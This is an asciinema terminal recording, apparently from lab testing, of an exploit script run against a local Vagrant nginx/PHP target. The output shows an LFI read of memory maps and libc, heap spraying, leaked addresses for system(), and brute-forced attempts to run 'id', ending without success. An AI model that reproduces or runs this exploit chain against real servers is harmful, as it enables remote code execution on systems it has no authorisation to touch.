{"version":3,"term":{"cols":80,"rows":24},"timestamp":1779312687,"command":"python3 tools/maps_only_bruteforce_exploit.py --target 192.168.1.205:19321 --cmd id --max-candidates 5 --progress-every 1 --proof-delay 0.1 --recovery-timeout 20","title":"maps-only Vagrant brute-force smoke ptrace_scope=1","env":{"SHELL":"/opt/homebrew/bin/fish"}}
[0.044, "o", "target        192.168.1.205:19321\r\nprimitive     LFI maps/libc + marker proof; no /proc/<pid>/mem; no core parsing\r\nptrace rule   target OS ptrace policy is not changed by this tool\r\ncommand       id\r\n\r\n"]
[0.029, "o", "[*] profiling heap growth with 20 delayed /spray bodies\r\n"]
[0.648, "o", "php uid       65534\r\nmaster pid    3044\r\nworker pid    26419\r\nnginx rw      0x55e420b83000\r\nlibc base     0x7fca47a6d000\r\nsystem        0x7fca47abdd70 (offset 0x50d70)\r\n"]
[0.000, "o", "candidate ranges\r\n  0x55e420b83000-0x55e420b99000 0x16000 /nginx-src/build/nginx\r\n"]
[0.000, "o", "  0x55e420b99000-0x55e420bbb000 0x22000 anonymous-rw\r\n"]
[0.000, "o", "  0x55e420ff3000-0x55e421058000 0x65000 [heap]\r\n"]
[0.000, "o", "  0x55e421058000-0x55e4210db000 0x83000 [heap]\r\n"]
[0.000, "o", "  0x7fca479e0000-0x7fca47a1b000 0x3b000 anonymous-rw\r\n  0x7fca47a68000-0x7fca47a6d000 0x5000 anonymous-rw\r\n"]
[0.000, "o", "  0x7fca47c89000-0x7fca47c96000 0xd000 anonymous-rw\r\n  0x7fca480f3000-0x7fca480f6000 0x3000 anonymous-rw\r\n  0x7fca48263000-0x7fca4826b000 0x8000 anonymous-rw\r\n  0x7fca48271000-0x7fca48273000 0x2000 anonymous-rw\r\n\r\n"]
[0.000, "o", "[*] address_mod=7 scanned=80 safe_seen=5 selected=5\r\n"]
[0.000, "o", "    try=1 mod=7 addr=0x55e420b83027 low=2730 rate=1000.00/s\r\n"]
[1.291, "o", "    try=2 mod=7 addr=0x55e420b8302f low=2f30 rate=1.55/s\r\n"]
[1.308, "o", "    try=3 mod=7 addr=0x55e420b83037 low=3730 rate=1.15/s\r\n"]
[1.313, "o", "    try=4 mod=7 addr=0x55e420b83047 low=4730 rate=1.02/s\r\n"]
[1.307, "o", "    try=5 mod=7 addr=0x55e420b8304f low=4f30 rate=0.96/s\r\n"]
[1.311, "o", "[!] exhausted selected candidates without marker proof\r\n"]
[0.013, "x", "1"]
